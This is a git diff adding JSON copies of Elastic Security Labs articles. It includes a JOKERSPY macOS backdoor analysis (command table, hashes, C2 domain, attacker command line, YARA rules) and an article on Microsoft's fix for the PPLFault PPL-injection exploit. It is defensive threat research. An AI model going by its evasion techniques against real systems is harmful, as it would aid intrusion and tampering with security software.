Elastic, experience our latest version of the [Elasticsearch Service](https://www.elastic.co/elasticsearch/service) on Elastic Cloud. Also be sure to take advantage of our [Quick Start training](https://www.elastic.co/training/elastic-security-quick-start) to set yourself up for success.\n"
+ },
+ "title": "Ingesting threat data with the Threat Intel Filebeat module",
+ "slug": "ingesting-threat-data-with-the-threat-intel-filebeat-module",
+ "date": "2023-03-01",
+ "description": "Tutorial that walks through setting up Filebeat to push threat intelligence feeds into your Elastic Stack.",
+ "author": [
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "marius-iversen"
+ }
+ ],
+ "image": "photo-edited-12-t.jpg",
+ "category": [
+ {
+ "slug": "security-operations"
+ },
+ {
+ "slug": "detection-science"
+ }
+ ],
+ "tags": [
+ "tutorial",
+ "filebeat",
+ "threat intel"
+ ]
+ },
+ "id": "security_labs_content-ingesting_threat_data_with_the_threat_intel_filebeat_module-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inital_research_of_jokerspy-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inital_research_of_jokerspy-md.json
new file mode 100644
index 00000000000..89b54b8b7c1
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inital_research_of_jokerspy-md.json
@@ -0,0 +1,47 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Initial research exposing JOKERSPY\"\nslug: \"inital-research-of-jokerspy\"\ndate: \"2023-06-21\"\nsubtitle: \"An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.\"\ndescription: \"Explore JOKERSPY, a recently discovered campaign that targets financial institutions with Python backdoors. This article covers reconnaissance, attack patterns, and methods of identifying JOKERSPY in your network.\"\nauthor:\n - slug: colson-wilhoit\n - slug: salim-bitam\n - slug: seth-goodwin\n - slug: andrew-pease\n - slug: ricardo-ungureanu\nimage: \"photo-edited-04@2x.jpg\"\ncategory:\n - slug: attack-pattern\n - slug: campaigns\ntags:\n - ref9134\n - jokerspy\n - cryptocurrency\n - defi\n - swiftbelt\n---\n\n## Key takeaways\n\n- This is an initial notification of an active intrusion with additional details to follow\n- REF9134 leverages custom and open source tools for reconnaissance and command and control\n- Targets of this activity include a cryptocurrency exchange in Japan\n\n## Preamble\n\nThis research article explores a recently discovered intrusion we’re calling REF9134, which involves using the **sh.py** backdoor to deploy the macOS Swiftbelt enumeration tool. **sh.py** and **xcc** have recently been dubbed [JOKERSPY](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/) by Bitdefender.\n\nSpecifically, this research covers:\n\n- How Elastic Security Labs identified reconnaissance from the adversary group\n- The adversary’s steps to evade detection using **xcc** , installing the **sh.py** backdoor, and deploying enumeration tools\n\nA deeper look at this attack may be published at a later date.\n\n## Overview\n\nIn late May of 2023, an adversary with existing access in a prominent Japanese cryptocurrency exchange tripped one of our diagnostic endpoint alerts that detected the execution of a binary ( **xcc** ). **xcc** is not trusted by Apple, and the adversary self-signed using the native macOS tool **codesign**. While this detection in itself was not necessarily innocuous, the industry vertical and additional activity we observed following these initial alerts caught our eye and caused us to pay closer attention.\n\nFollowing the execution of **xcc** , we observed the threat actor attempting to bypass TCC permissions by creating their own TCC database and trying to replace the existing one. On June 1st a new Python-based tool was seen executing from the same directory as **xcc** and was utilized to execute an open-source macOS post-exploitation enumeration tool known as Swiftbelt.\n\n## Analysis\n\nREF9134 is an intrusion into a large Japan-based cryptocurrency service provider focusing on asset exchange for trading Bitcoin, Ethereum, and other common cryptocurrencies.\n\n### The xcc binary\n\n**xcc** ( **d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8** ) is a self-signed multi-architecture binary written in Swift which is used to evaluate current system permissions. The version observed by Elastic Security Labs is signed as **XProtectCheck-55554944f74096a836b73310bd55d97d1dff5cd4** , and has a code signature resembling [publicly known](https://objective-see.org/blog/blog_0x73.html) and untrusted payloads.\n\n\n\nTo identify other binaries signed with the same identifier, we converted **XProtectCheck-55554944f74096a836b73310bd55d97d1dff5cd4** to hexadecimal and searched VirusTotal to identify 3 additional samples ( **content:\\{5850726f74656374436865636b2d35353535343934346637343039366138333662373333313062643535643937643164666635636434\\}** ).\n\nEach contained the same core functionality with structural differences. These discrepancies may indicate that these variants of **xcc** were developed to bypass endpoint capabilities that interfered with execution.\n\nShortly after the creation of **xcc** , researchers observed the threat actor copying **/Users/Shared/tcc.db** over the existing TCC database, **/Library/Application Support/com.apple.TCC/TCC.db**. This may enable the threat to avoid TCC prompts visible to system users while simultaneously abusing a directory with broad file write permissions.\n\n#### XCode artifacts\n\nDuring analysis of this binary, researchers identified two unique paths, **/Users/joker/Developer/Xcode/DerivedData/** and **/Users/joker/Downloads/Spy/XProtectCheck/XProtectCheck/** , which stood out as anomalous. The default path for compiling code with Xcode is **/Users/[username]/Developer/Xcode/DerivedData**.\n\n#### Abusing TCC\n\nThese introspection permissions are managed by the native Transparency, Consent, and Control (TCC) feature. Researchers determined that **xcc** checks FullDiskAccess and ScreenRecording permissions, as well as checking if the screen is currently locked and if the current process is a trusted accessibility client.\n\n\n\nUpon successfully executing in our [Detonate](https://www.elastic.co/security-labs/click-click-boom-automating-protections-testing-with-detonate) environment, the following results were displayed:\n\n\n\nOnce the custom TCC database was placed in the expected location, the threat actor executed the **xcc** binary.\n\n\n\n#### Initial access\n\nThe **xcc** binary was executed via bash by three separate processes\n\n- **/Applications/IntelliJ IDEA.app/Contents/MacOS/idea**\n- **/Applications/iTerm.app/Contents/MacOS/iTerm2**\n- **/Applications/Visual Studio Code.app/Contents/MacOS/Electron.**\n\nWhile we are still investigating and continuing to gather information, we strongly believe that the initial access for this malware was a malicious or backdoored plugin or 3rd party dependency that provided the threat actor access. This aligns with the connection that was made by the researchers at [Bitdefender](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/) who correlated the hardcoded domain found in a version of the **sh.py** backdoor to a Tweet about an infected macOS QR code reader which was found to have a malicious dependency.\n\n#### Deployed cryptographic libraries\n\nOn May 31st, researchers observed three non-native [DyLibs](https://developer.apple.com/library/archive/documentation/DeveloperTools/Conceptual/DynamicLibraries/100-Articles/UsingDynamicLibraries.html) deployed to **/Users/shared/keybag/** called **libcrypto.1.0.0.dylib** , **libncursesw.5.dylib** , and **libssl.1.0.0.dylib**. On MacOS, keys for file and keychain Data Protection are stored in [keybags](https://support.apple.com/en-au/guide/security/sec6483d5760/web), and pertain to iOS, iPadOS, watchOS, and tvOS. At this time, researchers propose that this staging serves a defense evasion purpose and speculate that they may contain useful vulnerabilities. The threat actor may plan to introduce these vulnerabilities to otherwise patched systems or applications.\n\n#### The sh.py backdoor\n\n**sh.py** is a Python backdoor used to deploy and execute other post-exploitation capabilities like Swiftbelt **.**\n\nThe malware loads its configuration from **~/Public/Safari/sar.dat**. The configuration file contains crucial elements such as command-and-control (C2) URLs, a sleep timer for beaconing purposes (the default value is 5 seconds), and a unique nine-digit identifier assigned to each agent.\n\n\n\nAs part of its periodic beaconing, the malware gathers and transmits various system information. The information sent includes:\n\n- Hostname\n- Username\n- Domain name\n- Current directory\n- The absolute path of the executable binary\n- OS version\n- Is 64-bit OS\n- Is 64-bit process\n- Python version\n\nBelow is a table outlining the various commands that can be handled by the backdoor:\n\n| Command | Description |\n| ------- | ------------------------------------------------------------------------------------- |\n| sk | Stop the backdoor's execution |\n| l | List the files of the path provided as parameter |\n| c | Execute and return the output of a shell command |\n| cd | Change directory and return the new path |\n| xs | Execute a Python code given as a parameter in the current context |\n| xsi | Decode a Base64-encoded Python code given as a parameter, compile it, then execute it |\n| r | Remove a file or directory from the system |\n| e | Execute a file from the system with or without parameter |\n| u | Upload a file to the infected system |\n| d | Download a file from the infected system |\n| g | Get the current malware's configuration stored in the configuration file |\n| w | Override the malware's configuration file with new values |\n\n### Swiftbelt\n\nOn June 1st, the compromised system registered a signature alert for [MacOS.Hacktool.Swiftbelt](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/MacOS_Hacktool_Swiftbelt.yar), a MacOS enumeration capability inspired by [SeatBelt](https://github.com/GhostPack/Seatbelt) and created by the red-teamer Cedric Owens. Unlike other enumeration methods, Swiftbelt invokes Swift code to avoid creating command line artifacts. Notably, **xcc** variants are also written using Swift.\n\nThe signature alert indicated that Swiftbelt was written to **/Users/shared/sb** and executed using the bash shell interpreter, **sh**. The full command line observed by researchers was **Users/Shared/sb /bin/sh -c /users/shared/sb \\\\> /users/shared/sb.log 2\\\\>&1** , demonstrating that the threat actor captured results in **sb.log** while errors were directed to STDOUT.\n\n## Diamond Model\n\nElastic Security utilizes the [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf) to describe high-level relationships between the adversaries, capabilities, infrastructure, and victims of intrusions. While the Diamond Model is most commonly used with single intrusions, and leveraging Activity Threading (section 8) as a way to create relationships between incidents, an adversary-centered (section 7.1.4) approach allows for a, although cluttered, single diamond.\n\n\n\n## Observed tactics and techniques\n\n### MITRE ATT&CK Tactics\n\nTactics represent the why of a technique or sub-technique. It is the adversary’s tactical goal: the reason for performing an action. These are the tactics observed by Elastic Security Labs in this campaign:\n\n- [Execution](https://attack.mitre.org/tactics/TA0002)\n- [Persistence](https://attack.mitre.org/tactics/TA0003)\n- [Privilege Escalation](https://attack.mitre.org/tactics/TA0004)\n- [Defense Evasion](https://attack.mitre.org/tactics/TA0005)\n- [Discovery](https://attack.mitre.org/tactics/TA0007)\n\n### MITRE ATT&CK Techniques / Sub techniques\n\nTechniques and Sub techniques represent how an adversary achieves a tactical goal by performing an action. These are the techniques observed by Elastic Security Labs in this campaign:\n\n- [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059)\n- [Dylib Hijacking](https://attack.mitre.org/techniques/T1574/004)\n- [Potential Exploitation for Privilege Execution](https://attack.mitre.org/techniques/T1068)\n- [Potential Abuse Elevation Control Mechanism](https://attack.mitre.org/techniques/T1548)\n- [Hide Artifacts](https://attack.mitre.org/techniques/T1564)\n- [Masquerading](https://attack.mitre.org/techniques/T1036)\n- [Obfuscating Files or Information](https://attack.mitre.org/techniques/T1027)\n- [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553)\n- [Application Window Discovery](https://attack.mitre.org/techniques/T1010)\n- [Screen Capture](https://attack.mitre.org/techniques/T1113)\n- [Crytpoistic Software](https://attack.mitre.org/software/S0498)\n- [Data from Local System](https://attack.mitre.org/techniques/T1005)\n\n## Detection logic\n\n### YARA\n\nElastic Security has created YARA rules to identify this activity. Below are YARA rules to identify the JOKERSPY backdoor and SwiftBelt tool.\n\n```\nrule Macos_Hacktool_JokerSpy {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2023-06-19\"\n last_modified = \"2023-06-19\"\n os = \"MacOS\"\n arch = \"x86\"\n category_type = \"Hacktool\"\n family = \"JokerSpy\"\n threat_name = \"Macos.Hacktool.JokerSpy\"\n reference_sample = \"d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8\"\n license = \"Elastic License v2\"\n\n strings:\n $str1 = \"ScreenRecording: NO\" fullword\n $str2 = \"Accessibility: NO\" fullword\n $str3 = \"Accessibility: YES\" fullword\n $str4 = \"eck13XProtectCheck\"\n $str5 = \"Accessibility: NO\" fullword\n $str6 = \"kMDItemDisplayName = *TCC.db\" fullword\n condition:\n 5 of them\n}\n```\n\n```\nrule MacOS_Hacktool_Swiftbelt {\n meta:\n author = \"Elastic Security\"\n creation_date = \"2021-10-12\"\n last_modified = \"2021-10-25\"\n threat_name = \"MacOS.Hacktool.Swiftbelt\"\n reference_sample = \"452c832a17436f61ad5f32ee1c97db05575160105ed1dcd0d3c6db9fb5a9aea1\"\n os = \"macos\"\n arch_context = \"x86\"\n license = \"Elastic License v2\"\n\n strings:\n $dbg1 = \"SwiftBelt/Sources/SwiftBelt\"\n $dbg2 = \"[-] Firefox places.sqlite database not found for user\"\n $dbg3 = \"[-] No security products found\"\n $dbg4 = \"SSH/AWS/gcloud Credentials Search:\"\n $dbg5 = \"[-] Could not open the Slack Cookies database\"\n $sec1 = \"[+] Malwarebytes A/V found on this host\"\n $sec2 = \"[+] Cisco AMP for endpoints found\"\n $sec3 = \"[+] SentinelOne agent running\"\n $sec4 = \"[+] Crowdstrike Falcon agent found\"\n $sec5 = \"[+] FireEye HX agent installed\"\n $sec6 = \"[+] Little snitch firewall found\"\n $sec7 = \"[+] ESET A/V installed\"\n $sec8 = \"[+] Carbon Black OSX Sensor installed\"\n $sec9 = \"/Library/Little Snitch\"\n $sec10 = \"/Library/FireEye/xagt\"\n $sec11 = \"/Library/CS/falcond\"\n $sec12 = \"/Library/Logs/PaloAltoNetworks/GlobalProtect\"\n $sec13 = \"/Library/Application Support/Malwarebytes\"\n $sec14 = \"/usr/local/bin/osqueryi\"\n $sec15 = \"/Library/Sophos Anti-Virus\"\n $sec16 = \"/Library/Objective-See/Lulu\"\n $sec17 = \"com.eset.remoteadministrator.agent\"\n $sec18 = \"/Applications/CarbonBlack/CbOsxSensorService\"\n $sec19 = \"/Applications/BlockBlock Helper.app\"\n $sec20 = \"/Applications/KextViewr.app\"\n condition:\n 6 of them\n}\n```\n\n## References\n\nThe following were referenced throughout the above research:\n\n- [https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack](https://www.bitdefender.com/blog/labs/fragments-of-cross-platform-backdoor-hint-at-larger-mac-os-attack/)\n\n## Observations\n\nThe following observables were discussed in this research.\n\n| Observable | Type | Name | Reference |\n| ---------------------------------------------------------------- | ------- | ------------------- | ------------------------ |\n| app.influmarket[.]org | Domain | n/a | sh.py domain |\n| d895075057e491b34b0f8c0392b44e43ade425d19eaaacea6ef8c5c9bd3487d8 | SHA-256 | /Users/Shared/xcc | Macos.Hacktool.JokerSpy |\n| 8ca86f78f0c73a46f31be366538423ea0ec58089f3880e041543d08ce11fa626 | SHA-256 | /Users/Shared/sb | MacOS.Hacktool.Swiftbelt |\n| aa951c053baf011d08f3a60a10c1d09bbac32f332413db5b38b8737558a08dc1 | SHA-256 | /Users/Shared/sh.py | sh.py script |\n"
+ },
+ "title": "Initial research exposing JOKERSPY",
+ "slug": "inital-research-of-jokerspy",
+ "subtitle": "An overview of JOKERSPY, discovered in June 2023, which deployed custom and open source macOS tools to exploit a cryptocurrency exchange located in Japan.",
+ "date": "2023-06-21",
+ "description": "Explore JOKERSPY, a recently discovered campaign that targets financial institutions with Python backdoors. This article covers reconnaissance, attack patterns, and methods of identifying JOKERSPY in your network.",
+ "author": [
+ {
+ "slug": "colson-wilhoit"
+ },
+ {
+ "slug": "salim-bitam"
+ },
+ {
+ "slug": "seth-goodwin"
+ },
+ {
+ "slug": "andrew-pease"
+ },
+ {
+ "slug": "ricardo-ungureanu"
+ }
+ ],
+ "image": "photo-edited-04@2x.jpg",
+ "category": [
+ {
+ "slug": "attack-pattern"
+ },
+ {
+ "slug": "campaigns"
+ }
+ ],
+ "tags": [
+ "ref9134",
+ "jokerspy",
+ "cryptocurrency",
+ "defi",
+ "swiftbelt"
+ ]
+ },
+ "id": "security_labs_content-inital_research_of_jokerspy-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inside_microsofts_plan_to_kill_pplfault-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inside_microsofts_plan_to_kill_pplfault-md.json
new file mode 100644
index 00000000000..83a1197b3cc
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-inside_microsofts_plan_to_kill_pplfault-md.json
@@ -0,0 +1,28 @@
+{
+ "attributes": {
+ "raw": {
+ "document": "---\ntitle: \"Inside Microsoft's plan to kill PPLFault\"\nslug: \"inside-microsofts-plan-to-kill-pplfault\"\ndate: \"2023-09-15\"\ndescription: \"In this research publication, we'll learn about upcoming improvements to the Windows Code Integrity subsystem that will make it harder for malware to tamper with Anti-Malware processes and other important security features.\"\nauthor:\n - slug: gabriel-landau\nimage: \"photo-edited-04@2x.jpg\"\ncategory:\n - slug: security-research\ntags:\n - security-research\n - detection-science\n---\n\nOn September 1, 2023, Microsoft released a new build of Windows Insider Canary, version 25941. Insider builds are pre-release versions of Windows that include experimental features that may or may not ever reach General Availability (GA). Build 25941 includes improvements to the Code Integrity (CI) subsystem that mitigate a long-standing issue that enables attackers to load unsigned code into Protected Process Light (PPL) processes.\n\nThe PPL mechanism was introduced in Windows 8.1, enabling specially-signed programs to run in such a way that they are protected from tampering and termination, even by administrative processes. The goal was to keep malware from running amok — tampering with critical system processes and terminating anti-malware applications. There is a hierarchy of PPL “levels,” with higher-privilege ones immune from tampering by lower-privilege ones, but not vice-versa. Most PPL processes are managed by Microsoft but members of the [Microsoft Virus Initiative](https://learn.microsoft.com/en-us/microsoft-365/security/intelligence/virus-initiative-criteria?view=o365-worldwide) are allowed to run their products at the [less-trusted Anti-Malware PPL level](https://learn.microsoft.com/en-us/windows/win32/services/protecting-anti-malware-services-).\n\n\n\nA few core Windows components run at the highest level of PPL, called Windows Trusted Computing Base (**WinTcb-Light**). Because of the protection afforded to these components and their narrow scope of function, they are considered more trusted than most user mode code. Most of these processes (such as **csrss.exe**) and their complex kernel-mode counterparts (such as **win32k.sys**) were written decades ago under different assumptions when the kernel-user boundary was even weaker than it is today. Rather than rewrite all these components, Microsoft made these user mode processes **WinTcb-Light**, mitigating tampering and injection attacks. [Alex Ionescu](https://twitter.com/aionescu) stated it clearly in 2013:\n\n>Because the Win32k.sys developers did not expect local code injection attacks to be an issue (they require Administrator rights, after all), many of these APIs didn’t even have SEH, or had other assumptions and bugs. Perhaps most famously, one of these, [discovered by j00ru](http://j00ru.vexillium.org/?p=1393), and still unpatched, has been used as the sole basis of the Windows 8 RT jailbreak. In [Windows 8.1 RT](http://forum.xda-developers.com/showthread.php?t=2092158), this jailbreak is “fixed”, by virtue that code can no longer be injected into Csrss.exe for the attack. [Similar](http://j00ru.vexillium.org/?p=1455) Win32k.sys exploits that relied on Csrss.exe are also mitigated in this fashion.\n\nTo reduce the attack surface, Microsoft runs most of their PPL code with less privilege than **WinTcb-Light**:\n\n\n\nMicrosoft does not consider PPL to be a [security boundary](https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria), meaning they won’t prioritize security patches for code-execution vulnerabilities discovered therein, but they have historically [addressed](https://itm4n.github.io/the-end-of-ppldump/) some such [vulnerabilities](https://x.com/GabrielLandau/status/1683854578767343619?s=20) on a less-urgent basis.\n\n### Loading code into PPL processes\n\nTo load code into a PPL process, it must be signed by special certificates. This applies to both executables (process creation) and libraries (DLLs loads). For the sake of simplicity, we’ll focus on DLL loading, but the CI validation process is very similar for both. This article is focused on PPL, so we will not discuss kernel mode code integrity.\n\n[Portable Executable](https://learn.microsoft.com/en-us/windows/win32/debug/pe-format) (PE) files come in many extensions, including EXE, DLL, SYS, OCX, CPL, and SCR. While the extension may vary, they’re all quite similar at a binary level. For a PPL process to load and execute a DLL, a few steps must be taken. Note that these steps are simplified, but should be sufficient for this article:\n\n 1. An application calls **[LoadLibrary](https://learn.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibraryw)**, passing the path to the DLL to be loaded.\n 2. **LoadLibrary** calls into the loader within NTDLL (e.g. **ntdll!LdrLoadDll**), which opens a handle to the file using an API such as **NtCreateFile**.\n 3. The loader then passes this file handle to **[NtCreateSection](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntcreatesection)**, asking the kernel memory manager to create a [section object](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views) which describes how the file is to be mapped into memory. A section object is also known as a [file mapping object](https://learn.microsoft.com/en-us/windows/win32/memory/file-mapping) in higher abstraction layers (such as Win32), but since we’re focused on the kernel, we’ll keep calling them section objects. The Windows loader always uses a specific type of section called an [executable image](https://learn.microsoft.com/en-us/windows-hardware/drivers/ifs/executable-images) (aka [SEC_IMAGE](https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-createfilemappinga)), which can only be created from PE files.\n 4. Before returning the section object to user mode, the memory manager checks the digital signature on the file to ensure it meets the requirements for the given level of PPL. The internal memory manager function **MiValidateSectionCreate** relies on the Code Integrity module **ci.dll** to handle the requisite cryptography and [PKI](https://en.wikipedia.org/wiki/Public_key_infrastructure) policy.\n 5. The memory manager restructures the PE so that it can be mapped into memory and executed. This step involves creating multiple subsections, one for each of the different portions of the PE file that must be mapped differently. For example, global variables may be read-write, whereas the code may be execute-read. To achieve this granularity, the resulting regions of memory must have distinct [page table entries](https://en.wikipedia.org/wiki/Page_table) with different page permissions. Other changes may be applied here, such as applying relocations, but they are out of scope for this research publication.\n 6. The kernel returns the new section handle to the loader in NTDLL.\n 7. The NTDLL loader then asks the kernel memory manager to map a [view of the section](https://learn.microsoft.com/en-us/windows-hardware/drivers/kernel/section-objects-and-views) into the process address space via the **[NtMapViewOfSection](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/wdm/nf-wdm-zwmapviewofsection)** syscall. The memory manager complies.\n 8. Once the view is mapped, the loader finishes the processing required to create a functional DLL in memory. The details of this are out of scope.\n\n### Page hashes\n\nIn the above steps, we can see that a PE’s digital signature is validated during section creation, but there is another way that code can be loaded into the address space of a PPL process - [paging](https://en.wikipedia.org/wiki/Memory_paging).\n\nUnmodified pages belonging to file-backed sections (including **SEC_IMAGE**) can be quickly discarded whenever the system is low on memory because there’s a copy of that exact data on disk. If the page is later touched, the CPU will issue a page fault, and the memory manager’s page fault handler will re-read that data from disk. Because **SEC_IMAGE** sections can only be created from immutable file data, and the signature has already been verified, the data is considered trusted.\n\nPE files may be optionally built with the [**/INTEGRITYCHECK**](https://learn.microsoft.com/en-us/cpp/build/reference/integritycheck-require-signature-check?view=msvc-170) flag. This sets a flag in the PE header that, among other things, instructs the memory manager to create and store hashes of every page (aka “page hashes”) of that PE as sections are created from it. After reading a page from disk, the page fault handler calls **MiValidateInPage** to verify that the page hash hasn’t changed since the signature was initially verified. If the page hash has changed, the handler will raise an exception. This feature is useful for detecting [bit rot](https://en.wikipedia.org/wiki/Data_degradation) in the page file and a few types of attacks. Beyond **/INTEGRITYCHECK** images, page hashes are [also enabled](https://twitter.com/DavidLinsley11/status/1190810926762450944) for all modules loaded into full Protected Processes (not PPL), and drivers loaded into the kernel.\n\n_**Note:** It is possible to create a **SEC_IMAGE** section from a file with [user-writable references](https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-mmdoesfilehaveuserwritablereferences), a tactic employed by techniques like [Process Herpaderping](https://jxy-s.github.io/herpaderping/). The existence of user-writable references means that a file could be modified after the image section is created. When a program attempts to use such a mutable file, the memory manager first copies the file’s contents to the page file, creating an immutable backing for the image section to prevent tampering. In this case, the section will not be backed by the original file, but instead by the page file. See [this Microsoft article](https://www.microsoft.com/en-us/security/blog/2022/06/30/using-process-creation-properties-to-catch-evasion-techniques/) for more information about user-writable references._\n\n### Exploitation\n\nIn September 2022, Gabriel Landau from Elastic Security filed VULN-074311 with MSRC, notifying them of two [zero-day](https://www.trendmicro.com/vinfo/us/security/definition/zero-day-vulnerability) vulnerabilities in Windows: one admin-to-PPL and one PPL-to-kernel. Two exploits for these vulnerabilities were provided named [PPLFault](https://github.com/gabriellandau/PPLFault) and [GodFault](https://github.com/gabriellandau/PPLFault#godfault), respectively, along with their source code. These exploits allow malware to [bypass LSA protection](https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection), terminate or blind EDR software, and modify kernel memory to tamper with core OS behavior - all without the use of any vulnerable drivers. See [this article](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) for more details on their impact.\n\nThe admin-to-PPL exploit PPLFault leverages the fact that page hashes are not validated for PPL and employs the [Cloud Filter API](https://learn.microsoft.com/en-us/windows/win32/api/_cloudapi/) to violate immutability assumptions of files backing **SEC_IMAGE** sections. PPLFault uses paging to inject code into a DLL loaded within a PPL process running as **WinTcb-Light**, the most privileged form of PPL. The PPL-to-kernel exploit GodFault first uses PPLFault to get **WinTcb-Light** code execution, then exploits the kernel’s trust of **WinTcb-Light** processes to modify kernel memory, granting itself full read-write access to physical memory.\n\nThough MSRC [declined](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need) to take any action on these vulnerabilities, the Windows Defender team has [shown interest](https://twitter.com/PhilipTsukerman/status/1683861340207607813?s=20). PPLFault and GodFault were released at [Black Hat Asia](https://www.blackhat.com/asia-23/briefings/schedule/#ppldump-is-dead-long-live-ppldump-31052) in May 2023 alongside a mitigation to stop these exploits called [NoFault](https://github.com/gabriellandau/PPLFault/tree/main/NoFault).\n\n### Mitigation\nOn September 1, 2023, Microsoft released build 25941 of Windows Insider Canary. This build adds a new check to the memory manager function **MiValidateSectionCreate** which enables page hashes for all images that reside on remote devices. Comparing 25941 against its predecessor 25936, we can see the following two new basic blocks:\n\n\n\nDecompiled into C, the new code looks like this:\n\n\n\nWhen PPLFault is run, Windows Error Reporting generates an event log indicating a failure during a paging operation:\n\n\n\nPPLFault requires its payload DLL to be loaded over the SMB network redirector to achieve the desired paging behavior. By forcing the use of page hashes for such network-hosted DLLs, the exploit can no longer inject its payload, so the vulnerability is fixed. The aforementioned [NoFault](https://github.com/gabriellandau/PPLFault/tree/main/NoFault) mitigation released at Black Hat also targets network redirectors, blocking such DLL loads into PPL entirely. Elastic Defend 8.9.0 and later block PPLFault - please update if you haven’t already.\n\nTracking down the exact point of failure in a kernel debugger, we can see the page fault handler invoking CI to validate page hashes, which fails with **STATUS_INVALID_IMAGE_HASH (0xC0000428)**. This is later converted to **STATUS_IN_PAGE_ERROR (0xC0000006)**.\n\n```\n0: kd> g\nBreakpoint 1 hit\nCI!CiValidateImagePages+0x360:\n0010:fffff805`725028b4 b8280400c0 mov eax,0C0000428h\n7: kd> k\n # Child-SP RetAddr Call Site\n00 fffff508`1b4a6dc0 fffff805`72502487 CI!CiValidateImagePages+0x360\n01 fffff508`1b4a6f90 fffff805`6f2f1bbd CI!CiValidateImageData+0x27\n02 fffff508`1b4a6fd0 fffff805`6ee35de5 nt!SeValidateImageData+0x2d\n03 fffff508`1b4a7020 fffff805`6efa167b nt!MiValidateInPage+0x305\n04 fffff508`1b4a70d0 fffff805`6ef9fffe nt!MiWaitForInPageComplete+0x31b\n05 fffff508`1b4a71d0 fffff805`6ef68692 nt!MiIssueHardFault+0x3fe\n06 fffff508`1b4a72e0 fffff805`6f0a784b nt!MmAccessFault+0x3b2\n07 fffff508`1b4a7460 00007fff`ccf71500 nt!KiPageFault+0x38b\n08 000000b6`776bf1b8 00007fff`d5500ac0 0x00007fff`ccf71500\n09 000000b6`776bf1c0 00000000`00000000 0x00007fff`d5500ac0\n7: kd> !error C0000428\nError code: (NTSTATUS) 0xc0000428 (3221226536) - Windows cannot verify the \n digital signature for this file. A recent hardware or software change \n might have installed a file that is signed incorrectly or damaged, or \n that might be malicious software from an unknown source.\n```\n\n### Comparing behavior\n\nWith the fix introduced in build 25941, the final vulnerable build is 25936. Running PPLFault in both builds under a kernel debugger, we can use the following WinDbg command to see the files for which CI is computing page hashes:\n\n```\nbp /w \"&CI!CipValidatePageHash == @rcx\" CI!CipValidateImageHash \n \"dt _FILE_OBJECT @r8 FileName; g\"\n```\n\nThis command generates the following WinDbg output for build 25936, before the fix:\n\n\n\nHere is the WinDbg output for build 25941, which includes the fix:\n\n\n\n### Conclusion\n\nDespite taking [longer than it perhaps should](https://www.elastic.co/security-labs/forget-vulnerable-drivers-admin-is-all-you-need), it's exciting to see Microsoft taking steps to defend PPL processes (including Anti-Malware) from malware running as admin, and users will benefit if this improvement reaches GA soon. Many features in Insider, even security features, are not available in (and may never reach) GA. Microsoft is very conservative when it comes to changes with potential stability, compatibility, or performance risk; memory manager changes are among the risker types. For example, the PreviousMode kernel exploit mitigation [spotted in Insider last November](https://twitter.com/GabrielLandau/status/1597001955909697536?s=20) still hasn’t reached GA, even after _at least_ 10 months.\n\n_Special thanks to [Grzegorz Tworek](https://twitter.com/0gtweet) for his help reverse engineering some kernel functions._"
+ },
+ "title": "Inside Microsoft's plan to kill PPLFault",
+ "slug": "inside-microsofts-plan-to-kill-pplfault",
+ "date": "2023-09-15",
+ "description": "In this research publication, we'll learn about upcoming improvements to the Windows Code Integrity subsystem that will make it harder for malware to tamper with Anti-Malware processes and other important security features.",
+ "author": [
+ {
+ "slug": "gabriel-landau"
+ }
+ ],
+ "image": "photo-edited-04@2x.jpg",
+ "category": [
+ {
+ "slug": "security-research"
+ }
+ ],
+ "tags": [
+ "security-research",
+ "detection-science"
+ ]
+ },
+ "id": "security_labs_content-inside_microsofts_plan_to_kill_pplfault-md",
+ "type": "security_labs_content"
+}
diff --git a/packages/security_labs_content/kibana/security_labs_content/security_labs_content-into_the_weeds_how_we_run_detonate-md.json b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-into_the_weeds_how_we_run_detonate-md.json
new file mode 100644
index 00000000000..a65af658fae
--- /dev/null
+++ b/packages/security_labs_content/kibana/security_labs_content/security_labs_content-into_the_weeds_how_we_run_detonate-md.json
@@ -0,0 +1,40 @@
+{
+ "attributes": {
+ "raw": {
